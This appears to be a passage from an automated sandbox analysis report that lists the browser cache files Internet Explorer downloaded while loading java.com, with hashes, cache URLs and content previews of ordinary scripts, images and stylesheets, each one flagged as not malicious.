                                                                                                                                                                                  Preview: /** vim: et:ts=4:sw=4:sts=4. * @license RequireJS 2.3.6 Copyright jQuery Foundation and other contributors.. * Released under MIT license, https://github.com/requirejs/requirejs/blob/master/LICENSE. */.var requirejs,require,define;(function(global,setTimeout){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.3.6",commentRegExp=/\/\*[\s\S]*?\*\/|([^:"'=]|^)\/\/.*$/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window||"undefined"==typeof navigator||!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\results[1].txt
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):8
                                                                                                                                                                                  Entropy (8bit):2.5
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:x:x
                                                                                                                                                                                  MD5:402E7A087747CB56C718BDE84651F96A
                                                                                                                                                                                  SHA1:7CE01F6381463362CF6AEF2F843A59261E8F5587
                                                                                                                                                                                  SHA-256:662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
                                                                                                                                                                                  SHA-512:5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://kqitits7mulnqyeucika-p323bx-53d3b3fe1-clientnsv4-s.akamaihd.net/eum/results.txt
                                                                                                                                                                                  Preview: Success!
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\10.cache[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):248479
                                                                                                                                                                                  Entropy (8bit):5.679841116358217
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:T4Kg0YE59pQVZ0QfqOWIyMeTsBXnYZEq+3:T4K3pwqoOUXnYk
                                                                                                                                                                                  MD5:C0505C29146931555F03C9B1CA33ADA8
                                                                                                                                                                                  SHA1:C9419243DC3B06FE21B54BD41FBC4FC9AEA3A986
                                                                                                                                                                                  SHA-256:B36941FAFF55CB4E1DB3A8DA151B535DC1F330D85AF2F6929C939176D534041F
                                                                                                                                                                                  SHA-512:B18667E764CD16550782EDE46B80AAFA41632A0DBAC44B1EA7A54F8EB9482541D7D191C2AC9B27F7E1E256A5C0C36764F6C59C8AA72AC18CD9A29062A7826C55
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/0D070042D9C67A68E1A4BF804E6E0E06/10.cache.js
                                                                                                                                                                                  Preview: function Rb(){}.function Vb(){}.function up(){}.function Kp(){}.function Qp(){}.function Wp(){}.function bq(){}.function zq(){}.function Oq(){}.function er(){}.function lr(){}.function $u(){}.function oU(){}.function sU(){}.function xU(){}.function HU(){}.function oV(){}.function rV(){}.function uV(){}.function xV(){}.function vW(){}.function QW(){}.function rX(){}.function uX(){}.function BX(){}.function EX(){}.function KX(){}.function EY(){}.function HY(){}.function G_(){}.function M7(){}.function P7(){}.function wbb(){}.function lcb(){}.function ocb(){}.function Meb(){}.function efb(){}.function hfb(){}.function kfb(){}.function nfb(){}.function qfb(){}.function ufb(){}.function xfb(){}.function Vjb(){}.function Itb(){}.function zyb(){}.function Jyb(){}.function hzb(){}.function Rzb(){}.function Uzb(){}.function UOb(){}.function MOb(){}.function QOb(){}.function GMb(){}.function XNb(){}.function KPb(){}.function xQb(){}.function RSb(){}.function YSb(){}.function dTb(){}.function kTb
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\JavaGreenfoot[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3629
                                                                                                                                                                                  Entropy (8bit):7.847576284308009
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:jAyzHk1IBRBpKMGLWfUOOyDFvKk2j4qm6mV9PUks4tiDY:l7fjKdyfUoDgjqXr04tiE
                                                                                                                                                                                  MD5:D28BC5EA9F5E4C6F983F012E071B2A21
                                                                                                                                                                                  SHA1:E76684B1DDC5D7BA3AE0BDB53C09893E1D4DA12B
                                                                                                                                                                                  SHA-256:73599CAFDE30FB5C1FC726A0D09595C7D5E681F670661990747B3294F8EF5746
                                                                                                                                                                                  SHA-512:4B91C49BD298EF4103D1127DA1D17EC3B75661105164D93AB5A5041192B231654BD84D4483AE24CFC82A4EFE586582EB5013A19AE24E7AA607F5882361E553F6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONTE27F21C0DDA34CE985D9F7C9D23FC8B0/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: ......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................G..........................!.1.."QUq.346ARasu........#B..$r.2b.%S.............................................................1.!A..Qq......."2...............?...i=5R.e.....e..K.@..n..I...)....f&.r........-.`.Ot.W..0..6S.?U.%...)....f.7..{....e=.._b[.....Ot.W..0l..~..K}.X..)....f...O.}.o....e=.._b[........-.acp.Y..:....&....}Y.CB.B....$.Z..4.9..QK../N...>]...s.!...E(.N8...J..s...j.&.P...l.hR....Xis.t...#.N.t...{.ai)v_~..}...H.(%I..p..$OF#..\4F..p[....}D....u~....H..;..@...=X..Q....k..k..I.GH.f...Y....H.!.{k.....8..+..2.s.J.Z.HY.M..>Q.(......a4.L.%3.f.%.N8.7.l.`.H .e.$.4....Fys._......NSj\.s..>....;'/>.<./p.R.....}M.-#....Q,...74K<#d...H...KZ;.~..X......Ki..G.:.....OV...,.....t..j...H|..:$.r.@..B...C.,>..d....qx.SV...N.mJ.je..i.eJ.S.5....2.....
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\controller[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):29779
                                                                                                                                                                                  Entropy (8bit):5.384616840808838
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:2tAXfo1yc8Z4n7hR0RQRRVVZxWJTSF1sR1ECaZq4kzer/JKva3M:Nbc8Z47zacVVZ8i1sReAHt
                                                                                                                                                                                  MD5:4E7A74127C680C9953242315466999E9
                                                                                                                                                                                  SHA1:E25BC8DA188D9D69A3A3276F4E834F871C8B2F7E
                                                                                                                                                                                  SHA-256:E27E66F37F0DE43B16DB3E9D60D0D3E537C09E55C84D19B2E42BA63308795478
                                                                                                                                                                                  SHA-512:3AA848EED23083121972B5F864E3402BCA05BA93CC32DC9E0AFC1A8E59B31EB55B122F5493F423EE6043F1991A8D9F4EDC29B5E22EE84157173767F0CD080D26
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js
                                                                                                                                                                                  Preview: "use strict";var SCS=window.SCS||{};SCS.sitePrefix=SCS.sitePrefix||"/",SCS.data={pageId:null,siteInfo:null,structure:null,structurePages:null,basePageModel:null,baseSlotReuseModel:null,pageModel:null,pageLayout:null,mobileLayout:null,navMap:{},navRoot:null,placeholderContent:null,startProgressTimer:null,pageTimeoutTimer:null},SCS.performance={timers:{}},SCS.xmlhttp=new XMLHttpRequest,Array.isArray||(Array.isArray=function(e){return"[object Array]"===Object.prototype.toString.call(e)}),String.prototype.trim||(String.prototype.trim=function(){return this.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,"")}),String.prototype.startsWith||(String.prototype.startsWith=function(e,t){return t=t||0,this.substr(t,e.length)===e}),SCS.preInitRendering=SCS.preInitRendering||function(){},SCS.initRendering=function(){this.data.startProgressTimer=setTimeout(this.onStartProgress,2500),this.data.pageTimeoutTimer=setTimeout(this.onPageTimeout,3e4),this.setCacheKeys(),this.processSitePrefix(),this.isPrerende
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\cookie_iframe[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5014
                                                                                                                                                                                  Entropy (8bit):5.070770931797894
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:yGYYYxNFxNmFZiQ/BDZhFIgRxI/wKRpRTWukeWaTESXDAvdD9iPDJi/dDJ3DDJJ2:yGYYgNLNmSQ5FPIgHILWaTESXDAvdD9k
                                                                                                                                                                                  MD5:1159F3467D523D0578BC6FAFEDD369EC
                                                                                                                                                                                  SHA1:9F08758879C608D2C718071344B96CEC910499B3
                                                                                                                                                                                  SHA-256:E5356C4D200584B116D9AC14F89D883B120DBE4D7878914A4FA22358074C74F8
                                                                                                                                                                                  SHA-512:22DAD07905FBB2399C7E83E81FE7514C0B2AF69C384B99CB93805884AFF55B82A6A090A57CC1C3B5435760FB1659BFCBD3A4A1EAE0DB0EA3FC8FE379551698CE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&behavior=expressed&gtm=1&layout=default_eu&irm=undefined&from=https://consent.trustarc.com/
                                                                                                                                                                                  Preview: <html>.<body>.<script type="text/javascript">.function createCookie(name,value,days) {. if (days) {. var date = new Date();. date.setTime(date.getTime()+(30000));. var expires = "; expires="+date.toGMTString();. }. else var expires = "";. if (shouldSendSameSiteNone(navigator.userAgent)) {. document.cookie = name+"="+value+expires+"; path=/; secure; SameSite=None";. } else {. document.cookie = name+"="+value+expires+"; path=/";. }.}..function readCookie(name) {. var nameEQ = name + "=";. var ca = document.cookie.split(';');. for(var i=0;i < ca.length;i++) {. var c = ca[i];. while (c.charAt(0)==' ') c = c.substring(1,c.length);. if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);. }. return null;.}..function eraseCookie(name) {. createCookie(name,"",-1);.}..function gup( name ).{. name = name.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");. var regexS = "[\\?&]"+name+"=([^&#]*)";.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\get[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2004
                                                                                                                                                                                  Entropy (8bit):5.228582846237988
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Qd+wePCCFJw2Gb7IhVkAvm7CJQZfuPEgOpcGbpCBOxm:QdjeqCF0TAvmOJ/Bos
                                                                                                                                                                                  MD5:EB36752D424D4B17D5C0786DA41ACF66
                                                                                                                                                                                  SHA1:EBCE41EF9C2581EA61E5C856885008A3E88E55FD
                                                                                                                                                                                  SHA-256:BD478D1E075F071CA0F0E7F3E27E4C22D27831B23DF86DD6D0F7A37C38263B0E
                                                                                                                                                                                  SHA-512:E071D33A9B303113E821A3626EBF8CA0E45B0241251862C521A42C68E5ED73C75FD0F18144517569940606736733B7BD2F974791DB10167606C610A838F5A231
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
                                                                                                                                                                                  Preview: <html><head><script>!function(){var e,t,a,r,n,s="truste.consent.",i=function(e){var t,a={},e=a._url=e;if(e=(a._query=e.replace(/^[^;?#]*[;?#]/,"")).replace(/[#;?&]+/g,"&"))for(e=e.split("&"),t=e.length;0<t--;){var r=e[t].split("="),n=r.shift();a[n]||(a[n]=r.length?decodeURIComponent(r.join("=")):"")}return a}(location.href).domain;function o(e,t){var a=JSON.stringify({source:"preference_manager",message:e,data:t});top.postMessage(a,"*"),parent.postMessage(a,"*")}function c(e){var t=null;try{var a=self.localStorage;t=a.getItem?a.getItem(e):a[e]}catch(e){}return t&&JSON.parse(t)||null}function p(e){try{var t=s+e,a=c(t);if(!a)return null;if(new Date(a.expires)<new Date)try{return self.localStorage.removeItem(t),null}catch(e){return null}return a}catch(e){}return null}function l(e,t){var a=c(e);!t.popTime&&a&&a.popTime&&(t.popTime=a.popTime);var r="string"==typeof t||t instanceof String?t:JSON.stringify(t);try{var n=self.localStorage;n.setItem?n.setItem(e,r):n[e]=r}catch(e){}}void 0!==i&&o
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\items[1].json
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):7214
                                                                                                                                                                                  Entropy (8bit):5.647875097933699
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:9q0XkZ4JddBzuclksHEqpK5lf35hS5hf5hO5h4Y:g0xJddtFlksHEWK5lf3PSPfPOP4Y
                                                                                                                                                                                  MD5:DE149FC4558B3C853E30AABCE0DC7F56
                                                                                                                                                                                  SHA1:2F7B55A7D6F62F63CF2760B93FFCA5BE04F373BB
                                                                                                                                                                                  SHA-256:8C9344A56407F0903D36DC274EBBD3D33D7014DB50BE118687F5F2D21661A6D7
                                                                                                                                                                                  SHA-512:89CA9A98A46A7D19057D43E50E6A2BF4B6D8826C708BF643031D2997822FB63913F257763EBCFA297B12D39A5DDA53947264362E93B17E7EF42524427B17C3B6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/items?q=((id%20eq%20"COREEACA6644ABED46228A54322C5E14161D"%20or%20id%20eq%20"CORE1CE64AD7F2E944B68F223DEBB0AF616A")%20and%20(language%20eq%20"en"))&channelToken=1f7d2611846d4457b213dfc9048724dc&cb=_cache_97bc
                                                                                                                                                                                  Preview: {"hasMore":false,"offset":0,"count":2,"limit":2,"items":[{"translatable":true,"createdDate":{"value":"2020-05-18T21:48:54.443Z","timezone":"UTC"},"name":"Home content","description":"","language":"en","links":[{"href":"https://orasites-prodapp.cec.ocp.oraclecloud.com/content/published/api/v1.1/items/COREEACA6644ABED46228A54322C5E14161D","rel":"self","method":"GET","mediaType":"application/json"}],"id":"COREEACA6644ABED46228A54322C5E14161D","updatedDate":{"value":"2021-04-22T20:08:16.263Z","timezone":"UTC"},"type":"JCOM_SimplePage","fields":{"omniture":null,"keywords":["java","downloads","software","java runtime","jre","java download","download java"],"Webreference":null,"addBodyTags":" Begin SiteCatalyst code version: G.5. --> <script language=\"JavaScript\" type=\"text/javascript\"> var s_channel = \"javac:Home\"; var s_pageName = \"javac:Homepage\"; var s_prop19 = \"en_javac:Homepage\"; var s_prop20 = \"Home_Pages\"; // var s_prop21 = \"180X150-728X90\"; var s_prop21 = \"180X
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\javamagazine(2)[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4226
                                                                                                                                                                                  Entropy (8bit):7.880591113615801
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:VBzQCZdNH3huPYdVNsFNCfBuJcNYK9nnp0V2+TITq:NZdNhuPYthTNYKATIW
                                                                                                                                                                                  MD5:2EFF9C6E995AD134C885B4BB0132891B
                                                                                                                                                                                  SHA1:35C7E3F315107B38E1E2179B432F5D4EBCCC7EB0
                                                                                                                                                                                  SHA-256:4C9A37DE6893B18623F4F0F5D8BD03767CD01CCCD23BD5A0F671B888520975D8
                                                                                                                                                                                  SHA-512:6E5140429C7C964B2405572044B39BE1154AC5191EFECE2CE9A386B05EA2BB1076A4A2F41C5993BB58C6FFCB6A5025AE5483F9EB24ED1469E14FA2E4F39A6890
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONT7D6EB42C70A34F858C8582494B5B021E/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: ......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!........................................J..........................!..1..AQa.."2RUq...#BS.......Tcr...$34bt.%Ds.................................1........................!.1Q...3Abq..."2a...4..............?..&;..J..K.0.[m.....YY$...It..+.....x..h..Q.L......te......=.U{..BxK....[....S..a..{...ov..;.U{..A.|\..|...\.U.2......:..e...A.r...s.....:..e....\..U.....A.r...s..T..U.2......>..e..........s.....:..e....S.}W..{.....:....[v.....-.....}....Se..P.8.M.......:M;76.*.y.v...K....w..A..50..01.....%..alu....mx.-..[^.,z...A...0...l.D........e.7!.....+..p.k..G.....okh.Sw.}..J.Y.i..J.QU..s.;....X...O..^KO..}.....i_hb...G...6..0rZ..+....-....|.....Z......N,..I....3.......d....e..a.s.a.e..P0nOQ.!....9.<~.o..8FE......rM.7......?.+...#-Z.......r+).Sq.v.mY..fbiUba..C...<IP.I.../0..H.j z.1.`.K.&e.%.y
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jv0_search_btn[1].gif
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 19 x 18
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):99
                                                                                                                                                                                  Entropy (8bit):5.689180797659173
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Clp6Wnta/CSxlOnRFSLUA6wZzzjgPQ2/rnle:Up9oaSjIOLUOjgPxrle
                                                                                                                                                                                  MD5:6B63F7479D5FDCF11F57F1315339A071
                                                                                                                                                                                  SHA1:0552EA5365B2C87B850DB6974645F0D81FBD22F8
                                                                                                                                                                                  SHA-256:AC0AFC4A38CF993FF8048D40E16725EC2C5A59737E68A4DC741A8EDD6A7D3384
                                                                                                                                                                                  SHA-512:CD875B3E9F87D9BB13784AEFAF9B155603C7A9E32008CEB7DE69DBF78A15D0EC3BE3664ABB1ACF82227D42DFF0BFEF0DBB9FE46E71F1348C164F6D4E5F6A7E8D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/jv0_search_btn.gif
                                                                                                                                                                                  Preview: GIF89a...................!.......,..........4..h...HX1....=.L...xP.....R&...u+....f.I*...(Af....;
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jv0dl_a[1].png
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:PNG image data, 672 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4741
                                                                                                                                                                                  Entropy (8bit):7.853820287173857
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ySDZ/I09Da01l+gmkyTt6Hk8nTKwD1IBxaf/76744xn+LGDDTmIiQceDrr7k:ySDS0tKg9E05TlD1Uwf/76744oyaIvf0
                                                                                                                                                                                  MD5:A6BE3E959427A5B5645356CBE0DFCF51
                                                                                                                                                                                  SHA1:818B4E71DACA0CA889B0714935A159E91C2F1B25
                                                                                                                                                                                  SHA-256:EEC8393557E19987E71F13592A34E39119CA17F5AC554974B937B437AA7DDC58
                                                                                                                                                                                  SHA-512:D7C9467FE6DDE7CA9B93F266F10BB0591B23F0E518BD35251A8DB08E33C3F43A9A5BBC0BDE8AD677E657A45352076D24FF789D0272B6001385EB37B158F91554
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/jv0dl_a.png
                                                                                                                                                                                  Preview: .PNG........IHDR.............[mL.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jv0ht[1].gif
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 351 x 173
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5672
                                                                                                                                                                                  Entropy (8bit):7.931442402707422
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:7V+XRRyaia6m3ZU9jfmZBDvseok66dOxoGElY8DXQBDk8V0SBqOT3QZgJn9o:7CRxia6+U9jfmXYefFcxoGUhQ68V0OwX
                                                                                                                                                                                  MD5:59AA1CA709F752690212C4E0039B0E4F
                                                                                                                                                                                  SHA1:BEB6644DF8190D7AF1F3DC1DCB4857AB4AEA74C7
                                                                                                                                                                                  SHA-256:26070A72AE2C336CE985EA6650D78B61304F75265087DDC7144FB407661637B0
                                                                                                                                                                                  SHA-512:89A2BA004CEFBBC56F19FD4FFBB8BA02DDA9E1063146101DC418436BFA1396FD28D5E7D3884E9A0D762CAFD1831690A5A96D77CF0EF52AD9FA53C4FE82F7C01D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/home/jv0ht.gif
                                                                                                                                                                                  Preview: GIF89a_......ddd...........nnn...yyy......................!.......,...._...@....I..8...`(.dirD..g...(..s.....@.xn..n....h.I............Hsp.3..Y.n..k..:.ZA..q9rw.u8n.PR...d....lM.@.T.@.]E-p..4gvxe.....H..hs.}.f$Q.......S'._....Z4...j&....K@...W....z..........!..n.4....@$.<..L..@.%.{..ijD..?....+g...e"...S..)Y.. (.......,.@r......\....!...p...0..0.Y.&.`#B..J...H..8.B.o.l.u...TT.D.X'."D..f=...H.sB.Y.. .....xzu.T.t[.r{.@#.gK.-..B2.d....".3{lp.0.f....O......3....+.....^...X.,...M.(..+...TCf.3J.6.D..L.....j..%<sBW..9....M.......p*\.........9.74.n.y...K .ha7.......YID..r.%..1........s".G.f3.XA,.!........!.e..}]T...0..E!...<.c[.&...u..W..,^....Y..y%..".....PF).TVi.Xf.e.3..ep..!....`...\..g0}y.....cxI.c..d..[.i...`H.....A..A....H....\....D.....iY.t..!.=....N...q.ZI..H..W.*..%.j..|...i...........x...&......C.4.RP..... .%..W.......*+.y..`.4..$[..............b.K..`.-...;...r.n.}m..bp0R.QA.`z...b.A.h.i....+....zq#...2.....r.0...DE...T.G.."ln#.n".~.+b2.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\render[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:exported SGML document, UTF-8 Unicode text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3922
                                                                                                                                                                                  Entropy (8bit):5.033296563341562
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:vb2Lm3CaOFVyvB4Ex0+m0YyMPt7xAQ5MiQwbGBOb7cDDts6J:TN4c9rEF7xqwbG4b7cftsq
                                                                                                                                                                                  MD5:1E621F239F2EF351D86D5E41C75126EF
                                                                                                                                                                                  SHA1:FBA636F058780CD43C981DFAB65BCF40499D5C26
                                                                                                                                                                                  SHA-256:86AC00A8DCFBEC6B2013EEA74A851C1FBC8FE6BB128F746293744A9DE7162196
                                                                                                                                                                                  SHA-512:475432796F0CFE3219E525DEECF5825284E328C492715CE5A322272E99EF5A4090E4FD83E02FE7FD2B01248770C2692E265C58279B0E6611B8FD79328995C543
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_compdelivery/_cache_2094/JCOM-Footer_Detail/assets/render.js
                                                                                                                                                                                  Preview: /**. * Copyright (c) 2019 Oracle and/or its affiliates. All rights reserved.. * Licensed under the Universal Permissive License v 1.0 as shown at http://oss.oracle.com/licenses/upl.. */./* globals define,console */.define([.."jquery",.."mustache",.."marked",.."text!./layout.html".], function ($, Mustache, Marked, templateHtml) {.."use strict";...// Content Layout constructor function...function ContentLayout(params) {...this.contentItemData = params.contentItemData || {};...this.scsData = params.scsData;...this.contentClient = params.contentClient;..}...// Helper function to format a date field by locale...function dateToMDY(date) {...if (!date) {....return "";...}....var dateObj = new Date(date);....var options = {....year: "numeric",....month: "long",....day: "numeric",....hour: "2-digit",....minute: "2-digit"...};...var formattedDate = dateObj.toLocaleDateString("en-US", options);....return formattedDate;..}...// Helper function to parse markdown text...function parseMarkdown(mdText
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\results[1].txt
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):8
                                                                                                                                                                                  Entropy (8bit):2.5
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:x:x
                                                                                                                                                                                  MD5:402E7A087747CB56C718BDE84651F96A
                                                                                                                                                                                  SHA1:7CE01F6381463362CF6AEF2F843A59261E8F5587
                                                                                                                                                                                  SHA-256:662EFAF46C617DDBCB8FF4A2A8F64CFFD3D93630F1003F8E66511F369B87730F
                                                                                                                                                                                  SHA-512:5080D776D0B123F20E97D44472EF2343BC022105AA67FC802B71668BAEB74A81530355589D50B1142165D17EF995AEAC196B6C15136D518A1EC0ABFA13C91D10
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://84-17-52-78_s-23-32-238-155_ts-1620316692-clienttons-s.akamaihd.net/eum/results.txt
                                                                                                                                                                                  Preview: Success!
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\screen[1].css
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):20825
                                                                                                                                                                                  Entropy (8bit):4.994143793467963
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:UoURDmGjjKJzOh+7V6iKFd7FAtDHFxQFW23:WiGj+zOI7Vq7FAlFSFV3
                                                                                                                                                                                  MD5:A74B0D2CD7E657A5CB55B9BC1B6985C3
                                                                                                                                                                                  SHA1:5D4CDC3E796E06B2542450F4D0533F02E26D9C09
